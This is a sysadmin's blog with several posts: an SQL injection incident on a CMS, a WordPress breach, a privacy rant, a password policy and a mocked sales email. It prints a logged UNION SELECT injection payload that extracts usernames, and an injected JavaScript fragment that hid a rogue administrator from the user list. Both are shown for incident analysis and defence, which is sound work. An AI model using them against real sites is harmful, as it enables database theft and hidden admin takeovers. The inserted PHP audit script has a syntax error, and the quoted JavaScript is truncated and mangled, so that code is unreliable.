SQL exploits

April 11th, 2012 | by | security, sysadmin


You know it's going to be a bad day when you get the following email:

Did someone hack our website? It looks like a Chinese news listing entry has been added with today’s date.

Ballsack!

Time to roll up the sleeves. How bad is the damage?

From the looks of it, other sites on the web server had not been damaged. A search for modified files found nothing out of the ordinary had been changed. Log files, sure, but nothing out of the ordinary. A search through the web logs of the site showed that this appeared to be an attack on the Content Management System (CMS) for the site.

Whichever jackass wrote that code should be beaten! Get the torches and pitchforks, death to the programmer!! Oh wait, that was me. Death to the evil script kiddie that attacked my beautiful code!!!!!!!!!

Searching through the logs, I started seeing some interesting entries, a bunch of them with variations such as this:

http://unigleeclub.com/news.phtml?id=-999.9%20UNION%20ALL%20SELECT%200x31303235343830303536,(SELECT%20concat(0x7e,0x27,Hex(cast(user.username%20as%20char)),0x27,0x7e)%20FROM%20`gleeclub`.user%20LIMIT%203,1)%20,0x31303235343830303536,0x31303235343830303536--

This one actually came after a lot of hits from the attacker, first figuring out the tables and then getting down to the nitty gritty of pulling out a username and password.

The issue was that I had forgotten to sanitize my data. Like a jackass, I didn’t check that $id was an actual integer variable, and when they ran their script they were able to pull out a hex string that, with the use of such tools as this site, you can easily translate into text.

The Quick Fix

I put in 2 fixes to ensure that we were dealing with an integer value here. First, I did some simple math on the variable that changes its type if it is not an integer.

$id = $id+0;

If you have a string, you’ll get back a zero. If you have an integer value, you’re good to go.

Also in the code, I expanded the if statement that was around the code to grab the specific news item. Instead of just checking to see if the $id variable was set, I now check that it is set and greater than zero, another layer in ensuring that we have a number instead of a string of text.

//Before:
if(isset($id) && $id != "")

//After:
if(isset($id) && $id != "" && $id > 0)
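The two fixes above, shown side by side with the original pattern, as an added example that is not the site's own code. It runs stand-alone against an in-memory SQLite database through PDO; the `news` and `user` tables, their columns and the sample rows are assumptions for illustration. One caveat on the arithmetic trick: on PHP 8, "abc" + 0 throws a TypeError and "-999.9 UNION ..." + 0 still evaluates to -999.9, so the hardened version validates with filter_var() and binds the value as a query parameter, which keeps the query's shape fixed no matter what arrives in $id.

```php
<?php
// Added example (not the site's own code): the vulnerable pattern beside a hardened
// version. Runs stand-alone against an in-memory SQLite database through PDO;
// the `news` and `user` tables and their columns are assumptions for illustration.

function build_sample_db(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT)');
    $db->exec('CREATE TABLE user (id INTEGER PRIMARY KEY, username TEXT, password TEXT)');
    // Constructed sample rows.
    $db->exec("INSERT INTO news VALUES (1, 'Spring concert', 'Doors open at 7pm')");
    $db->exec("INSERT INTO user VALUES (1, 'alice', 'password-hash-goes-here')");
    return $db;
}

// BEFORE: $id is interpolated straight into the SQL text. The isset/!= "" check
// only rules out an empty value, so whatever the client sends becomes part of the query.
function news_item_vulnerable(PDO $db, $id): ?array {
    if (isset($id) && $id != "") {
        $row = $db->query("SELECT id, title, body FROM news WHERE id = $id")->fetch(PDO::FETCH_ASSOC);
        return $row ?: null;
    }
    return null;
}

// AFTER: validate as an integer, require it to be positive, and bind it as a
// parameter so the query's shape is fixed before any user data is involved.
// filter_var() rather than "$id + 0": in PHP 8, "abc" + 0 throws a TypeError
// and "-999.9 UNION ..." + 0 still evaluates to -999.9, so the arithmetic trick
// is not a reliable type check on its own.
function news_item_hardened(PDO $db, $id): ?array {
    $id = filter_var($id, FILTER_VALIDATE_INT);   // false for anything that is not a whole number
    if ($id === false || $id <= 0) {
        return null;
    }
    $stmt = $db->prepare('SELECT id, title, body FROM news WHERE id = :id');
    $stmt->execute([':id' => $id]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row ?: null;
}

// Demonstration with a constructed payload of the same shape as the logged request,
// trimmed to syntax SQLite understands.
$db = build_sample_db();
$payload = '-1 UNION ALL SELECT id, username, password FROM user';

var_dump(news_item_vulnerable($db, $payload));  // unsafe path: the payload is executed as SQL
var_dump(news_item_hardened($db, $payload));    // hardened path: rejected before any query runs
var_dump(news_item_hardened($db, '1'));         // a legitimate id still works
var_dump(news_item_hardened($db, '0'));         // zero fails the > 0 check, as in the fix above
```

The `$id > 0` check is kept because it is cheap and catches the "0" and negative cases that an integer cast alone lets through; the prepared statement is what actually closes the injection, since the database receives the query text and the value separately.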

We’re all human and humans make mistakes. This code that was exploited was written 8 years ago, at a time when I should have known better but missed it. It lived in the wild up until last year, when it was finally exploited. I’m lucky that it took that long for it to expose itself, but kind of embarrassed that it was there in the first place. While I tend to come down hard on people for not doing these sorts of things, it's only because I’ve learned my lesson the hard way and have seen people continually mess this stuff up. While this happened to me a while ago, I’ve had friends get bit by this very recently, so I figured it was time to finish off this post and get it out the door. An ounce of prevention sort of thing.

To learn more about SQL Injection attacks, here is a good article by Bhanu Mahesh on Quality Software Connection on how to prevent them.

Privacy Wars

April 23rd, 2011 | by | apple, rants, security


A recent article from the Guardian shows that your iPhone keeps a record of everywhere you go. Many of you know that I’m an iPhone user and supporter, as I have an often neglected iPhone App site.

You’re probably thinking to yourself right now, great, another fanboy coming to Apple’s rescue.

WRONG!

What the fuck Apple? Seriously, what the fuck? Is there a good reason for keeping track of this data? I mean seriously, what are you doing with it?

Actually, there is a good reason for it and it's all about advertising. The guys at work have heard me say this on multiple occasions: the iPod, iPhone, iTouch and iPad are all marketing devices. Mainly for selling anything and everything from iTunes, but with iAd they can now sell you anything. It turns out that with a little googling you can find that the Terms and Conditions changed with iOS 4, and a feature was explained whereby Apple can track you to provide more relevant ads to your phone, and also to provide features such as Find My iPhone.

To provide location-based services on Apple products, Apple and our partners and licensees may collect, use, and share precise location data, including the real-time geographic location of your Apple computer or device. This location data is collected anonymously in a form that does not personally identify you and is used by Apple and our partners and licensees to provide and improve location-based products and services. For example, we may share geographic location with application providers when you opt in to their location services.

Some location-based services offered by Apple, such as the MobileMe “Find My iPhone” feature, require your personal information for the feature to work.

Apple and its partners use cookies and other technologies in mobile advertising services to control the number of times you see a given ad, deliver ads that relate to your interests, and measure the effectiveness of ad campaigns. If you do not want to receive ads with this level of relevance on your mobile device, you can opt out by accessing the following link on your device: http://oo.apple.com. If you opt out, you will continue to receive the same number of mobile ads, but they may be less relevant because they will not be based on your interests. You may still see ads related to the content on a web page or in an application or based on other non-personal information. This opt-out applies only to Apple advertising services and does not affect interest-based advertising from other advertising networks.

So does this make it right? No, I don’t think so. I think this sort of tracking is very very wrong. If you want to put up a service like this, it should be in the app to disclose my location. If I’m a developer, I have to allow for this pop-up to appear. But apparently Apple and their iAds do not. That is where we have an issue. The end user is used to the pop-up appearing, and only then does their location information get used. However, Apple apparently bypasses this for their iAd service, which is not honoring the end user's wishes in all cases.

So what can you do?

I know I only have myself to blame for this one, as I should have read the terms and conditions more closely. But there is a way out of it. Just as you read above, simply go to http://oo.apple.com/ on your iOS device and you can opt out of the tracking. (Credit Geeky-Gadgets.com for this post.)

What about Google

Don’t worry Android fans, you’re not left out in the cold either. It turns out the Wall Street Journal has discovered that Google is also transmitting data from Android.

And don’t forget about the Google street cars and their tomfoolery.

There is a site out there that can map the location of your wireless router via Google Android’s wardriving database. I put in the MAC address of my wireless router and was not surprised to find it in there with a GPS coordinate of my street. Awesome!

So now what?

Like many people out there, I was pretty pissed at Apple and Google to begin with. But at the same time, it's my own damn fault; I didn’t read the Terms and Conditions like I should have.

We live in a society of ever increasing intrusions into our private lives. These intrusions must be fought off in order to keep our private lives private. So my friends, opt out whenever you can and stay vigilant of new “features” that are released. Your privacy is only good if you fight to protect it.


20%

January 2nd, 2010 | by | security, sysadmin


We launched our Hosted Exchange 2007 Product just over a year ago. And for the most part, things have gone great.

One of our early decisions was to balance the security of the system with making the system as user friendly as possible. Originally, we had a pretty strict password policy. We soon found that many of our customers were not too happy with this policy and thought it was too much. Were we out-of-control security freaks? Shouldn’t the customer appreciate the steps that we are taking to secure not only our servers, but their information!

Looking around at other vendors, we quickly found that we may have been a bit too harsh. Take Gmail, for example. Sure, it's not Exchange, but then again it has over 100 million users. If they had massive issues with security and hacking, they clearly have it under control behind the scenes so things do not get out of hand.

And have you ever been prompted to change your password on Gmail? I haven’t.

So we compromised. We altered the time between when the system forces you to change your password. We altered the number of passwords that you could recycle. And we also added a somewhat buried feature in our customer portal. That feature: ‘allow passwords to never expire’.

Holy crap! Let’s just blow a huge freaking hole in the security system shall we.

This was a feature that we were not all that happy about, but with the other measures in place we figured we would avoid passwords such as abc123. It makes the end user happy, and we have some level of security, though not as high and tight as we would like. But it's better than having things wide open.

Now here is the shocking part of this. 20% of our users have this feature enabled. 20-freaking-percent! I was really hoping for this number to be in the 5-10% range. But no, 1 in 5 of our users will never change their password again.

Or will they?

I’m currently developing a nag script that will send out a reminder to the end users every couple of months. Not enough to completely annoy the heck out of them, but hopefully enough to get a good portion of that 20% to change their passwords on a semi-regular basis.
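One way to pick who gets nagged, as an added example rather than the author's own script. It assumes an export of each mailbox account's directory attributes as Active Directory stores them (userAccountControl, whose 0x10000 bit is the "password never expires" flag, and pwdLastSet, a count of 100-nanosecond ticks since 1601-01-01) plus a record of when each user was last reminded; every account and timestamp below is constructed.

```php
<?php
// Added example, not the author's nag script. Assumes a directory export with
// userAccountControl and pwdLastSet per account (Active Directory's attributes)
// and a map of when each user was last reminded. All records are constructed.

const DONT_EXPIRE_PASSWD   = 0x10000;       // userAccountControl flag behind "never expire"
const REMIND_EVERY_DAYS    = 60;            // "every couple of months"
const SECONDS_1601_TO_1970 = 11644473600;   // pwdLastSet is 100-ns ticks since 1601-01-01

function filetime_to_unix(int $ticks): int {
    return intdiv($ticks, 10000000) - SECONDS_1601_TO_1970;
}

function unix_to_filetime(int $ts): int {
    return ($ts + SECONDS_1601_TO_1970) * 10000000;
}

function never_expires(array $acct): bool {
    return ($acct['userAccountControl'] & DONT_EXPIRE_PASSWD) !== 0;
}

// Share of accounts with the never-expire flag set (the figure the post reports as 20%).
function never_expire_share(array $accounts): float {
    $flagged = count(array_filter($accounts, 'never_expires'));
    return $accounts ? $flagged / count($accounts) : 0.0;
}

// Never-expire accounts that have not been reminded within REMIND_EVERY_DAYS,
// with the current password age so the message can say how stale it is.
function select_reminders(array $accounts, array $lastReminded, int $now): array {
    $due = [];
    foreach ($accounts as $a) {
        if (!never_expires($a)) {
            continue;   // the normal expiry policy already covers these accounts
        }
        $last = $lastReminded[$a['mail']] ?? null;
        if ($last !== null && ($now - $last) < REMIND_EVERY_DAYS * 86400) {
            continue;   // nagged recently enough
        }
        $due[] = [
            'mail'              => $a['mail'],
            'password_age_days' => intdiv($now - filetime_to_unix($a['pwdLastSet']), 86400),
        ];
    }
    return $due;
}

// Constructed sample: five accounts (0x200 = NORMAL_ACCOUNT), two with never-expire set,
// one of which was reminded two weeks ago and so is skipped this round.
$now = strtotime('2010-01-02 00:00:00 UTC');
$day = 86400;
$accounts = [
    ['mail' => 'a@example.com', 'userAccountControl' => 0x200,           'pwdLastSet' => unix_to_filetime($now - 20 * $day)],
    ['mail' => 'b@example.com', 'userAccountControl' => 0x200 | 0x10000, 'pwdLastSet' => unix_to_filetime($now - 400 * $day)],
    ['mail' => 'c@example.com', 'userAccountControl' => 0x200,           'pwdLastSet' => unix_to_filetime($now - 45 * $day)],
    ['mail' => 'd@example.com', 'userAccountControl' => 0x200 | 0x10000, 'pwdLastSet' => unix_to_filetime($now - 300 * $day)],
    ['mail' => 'e@example.com', 'userAccountControl' => 0x200,           'pwdLastSet' => unix_to_filetime($now - 10 * $day)],
];
$lastReminded = ['d@example.com' => $now - 15 * $day];

printf("%.0f%% of accounts have passwords that never expire\n", 100 * never_expire_share($accounts));
foreach (select_reminders($accounts, $lastReminded, $now) as $r) {
    printf("remind %s (password is %d days old)\n", $r['mail'], $r['password_age_days']);
}
```

Keying the reminder interval off the last reminder rather than off the password age is deliberate: the accounts in question never have to change their password, so the age only ever grows, and the script would otherwise fire every run.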

So what do you do for your password policy? Leave your tips and tricks in the comments section. We’d like to hear what you think is an acceptable policy to stay secure!


WordPress Security Concern

September 13th, 2009 | by | security, sysadmin


I’m not sure if you’ve applied the latest updates for WordPress, but I did last week. However, it appears that someone got into one of the blogs that I manage and created an account for themselves. They didn’t do anything with it, but they DID have full admin access. I’m assuming that this was due to a security bug in 2.8.3, as they got in when that version was on the server.

So patch your servers if you haven’t already!

Here’s how I noticed that the person had gotten in. I was doing an audit of the users on the site and noticed that the count next to Administrators stated that there were 3 Admins for the site. However, when I viewed the list, there were only 2 on the page. Taking a look in the database, I noticed a user with a goofy name for an admin. And peeking in the wp_usermeta table, I noticed the following attribute was assigned to their firstname:

    for (var i = 0; i < tags.length; i++) {
        var t=tags[i].innerHTML;
        var h=tags[i];
        if(t.indexOf(s)>0){
            s =(parseInt(t)-1)+s;
            h.removeChild(h.firstChild);
            t = document.createTextNode(s);
            h.appendChild(t);
        }
    }
    var arr=document.getElementsByTagName("ul");
    for(var i in arr) if(arr[i].className=="subsubsub"){
        var n=/>Administrator ((d+))</gi.exec(arr[i].innerHTML);
        if(n[1]>0){
            var txt=arr[i].innerHTML.replace(/>Administrator ((d+))</gi,">Administrator ("+(n[1]-1)+")<");
            arr[i].innerHTML=txt;
        }
    }
}catch(e){};
};
addLoadEvent(setUserName);

It's not formatted the greatest, but basically it hides the username from the list. Nice, eh! Simply deleting this entry made the user show up in the user list, where I was able to do some auditing before blowing away the user.

So audit your admin list and patch your servers! This could have been a lot worse if they had started defacing the site or hiding other gems on there.
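The audit described above, done against the database rather than the admin screen, as an added example that is not code from the post or from WordPress. It rebuilds the two tables the post mentions (wp_users and wp_usermeta, with the default "wp_" prefix) in an in-memory SQLite database with constructed rows, counts the administrators straight from the capabilities meta, and flags any profile field of theirs that holds script or HTML markup instead of a name.

```php
<?php
// Added example, not code from the post or from WordPress itself. Constructed
// copies of wp_users and wp_usermeta in an in-memory SQLite database, then the
// audit: count admins from the database and flag profile fields carrying markup.

function build_sample_wp_db(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_registered TEXT)');
    $db->exec('CREATE TABLE wp_usermeta (umeta_id INTEGER PRIMARY KEY, user_id INTEGER, meta_key TEXT, meta_value TEXT)');

    // Constructed sample accounts; ID 3 plays the "goofy name" admin from the post.
    $users = [
        [1, 'matt',   '2008-05-01 10:00:00'],
        [2, 'editor', '2009-01-15 09:30:00'],
        [3, 'xq7z9',  '2009-09-06 03:12:44'],
    ];
    $ins = $db->prepare('INSERT INTO wp_users VALUES (?, ?, ?)');
    foreach ($users as $u) { $ins->execute($u); }

    // wp_capabilities holds a serialized PHP array of roles (default table prefix "wp_").
    $meta = [
        [1, 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}'],
        [1, 'first_name',      'Matt'],
        [2, 'wp_capabilities', 'a:1:{s:6:"editor";b:1;}'],
        [3, 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}'],
        [3, 'first_name',      '<script type="text/javascript">addLoadEvent(setUserName);</script>'],
    ];
    $ins = $db->prepare('INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES (?, ?, ?)');
    foreach ($meta as $m) { $ins->execute($m); }
    return $db;
}

// Returns the administrators as the database sees them, plus any of their
// profile fields whose value looks like markup rather than a name.
function audit_admins(PDO $db): array {
    $admins = $db->query(
        "SELECT u.ID, u.user_login, u.user_registered
           FROM wp_users u
           JOIN wp_usermeta c ON c.user_id = u.ID
          WHERE c.meta_key = 'wp_capabilities' AND c.meta_value LIKE '%administrator%'
          ORDER BY u.ID"
    )->fetchAll(PDO::FETCH_ASSOC);

    $findings = [];
    $metaStmt = $db->prepare('SELECT meta_key, meta_value FROM wp_usermeta WHERE user_id = :id');
    foreach ($admins as $a) {
        $metaStmt->execute([':id' => $a['ID']]);
        foreach ($metaStmt->fetchAll(PDO::FETCH_ASSOC) as $m) {
            // Markers of injected script: script tags, javascript: URLs, inline event handlers.
            if (preg_match('~<\s*/?\s*script|javascript:|\bon\w+\s*=~i', $m['meta_value'])) {
                $findings[] = sprintf('user %s (ID %d, registered %s): %s contains script markup',
                                      $a['user_login'], $a['ID'], $a['user_registered'], $m['meta_key']);
            }
        }
    }
    return [
        'admin_count' => count($admins),
        'admins'      => array_column($admins, 'user_login'),
        'findings'    => $findings,
    ];
}

$report = audit_admins(build_sample_wp_db());
printf("%d administrator(s) in the database: %s\n", $report['admin_count'], implode(', ', $report['admins']);
foreach ($report['findings'] as $f) {
    echo "FLAG: $f\n";
}
```

Compare admin_count with the number of rows the Users screen actually shows; a mismatch is exactly the discrepancy that gave this one away, and it stays visible no matter what the injected script does to the page.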

-Matt


Verisign Spam

July 21st, 2009 | by | rants, security, spam, sysadmin


Some people never learn. If you spam me, there is a good chance that I WILL mock you on the internet. Sure my site gets all of 2 readers a week, but they will know how big of a jackass you are.

Here is the spam that I got from Verisign:

—— Forwarded Message
From: “Borgches, Sergio”
Date: Thu, 16 Jul 2009 11:39:24 -0500
To: Webmaster
Subject: Ineffective EV SSL Certificate on domain: my.lightedge.com

Dear Webmaster

Ineffective EV SSL Certificate on domain: my.lightedge.com

Are you aware that the Extended Validation (EV) SSL Certificate that
you have on your domain does not display the standard EV interface
that your customers are expecting on Firefox 3.5?

Mozilla launched the latest version of their browser, on 2 July 2009.
Not only has it won the Guinness World Record for more than a
million downloads in a short time, but Firefox 3 currently accounts
for over 20% of global browser market share.

Instead of displaying the GREEN address bar, which reassures visitors
that your site is safe and authentic, it is displaying the BLUE
address bar, which means they do not get the full benefit of EV.
(Please see screenshot attached).

A rapidly growing portion of your Web site visitors are not seeing
the green address bar. It has shown in research that users look for
the green address bar on the sites with which they transact and that
77% of users will hesitate to complete the transaction on a site that
once had the green address bar but no longer does (TecEd study,
2007).

VeriSign is the leader in EV SSL security and we would like to assist
you to rectify this problem by offering you a replacement EV SSL
Certificate AT NO CHARGE! Our Extended Validation SSL Certificates
trigger the green bar in Firefox 3.5. We work closely with the
browser manufacturers to make sure that our customers’ security is
always world class and that there are no interruptions in your online
security.

To take advantage of this offer, and to make sure that your address
bar is GREEN in all current EV-enabled browsers please contact me and
I’ll help you switch to VeriSign, the worldwide leader in trusted
Internet communications and commerce.

Yours faithfully

Sergio Borgches
Inside Sales Executive
VeriSign Security Services
sborgches@verisign.com
Toll Free: 866.893.6565 option 1 ext 2296

First off Sergio, the webmaster address? Really? Like anyone really reads that stuff anymore. Half the time these go to an admin buried deep in cubeland who has filters that take webmaster, hostmaster and yourmom@domain.com and route them into the bit bucket. I have these same filters, I’m that guy! I just happened to be going through my spam folder (yes, it was caught as spam Sergio!) when I found this little gem. I just couldn’t pass it up. Here’s my advice, Sergio: if you really want to get someone’s attention, you CALL them.

Now, besides the fact that you didn’t call, this is a bit like ambulance chasing if you ask me. And I can’t say that I really blame you for it, but it still makes you a scum bag. The issue isn’t with the certificate. The certificate is STILL an Extended Validation (EV) certificate that shows up with the green bar in just about every browser out there except for Firefox 3.5. Why? Well, it's a bug in the browser. More details can be found here. If you happen to have a Verisign, Thawte or, I think, GeoTrust certificate, you’re fine. This just seems to be an issue with a few providers, GlobalSign being one of those. But never fear, addons.mozilla.com is also protected by a GlobalSign EV certificate, so they are well aware of this issue. But instead of taking the high road and just putting out a press release saying that Verisign customers are not affected by the latest EV certificate issues in Firefox 3.5, you took the lowest road of them all and sent out spam spreading fear, uncertainty and doubt. Way to keep it classy!

So this, Sergio, is why I’m not going to swing my business over to you. Sure, you’re just trying to get a leg up on the competition. But the methods by which you are doing it make me want to work with GlobalSign even more.
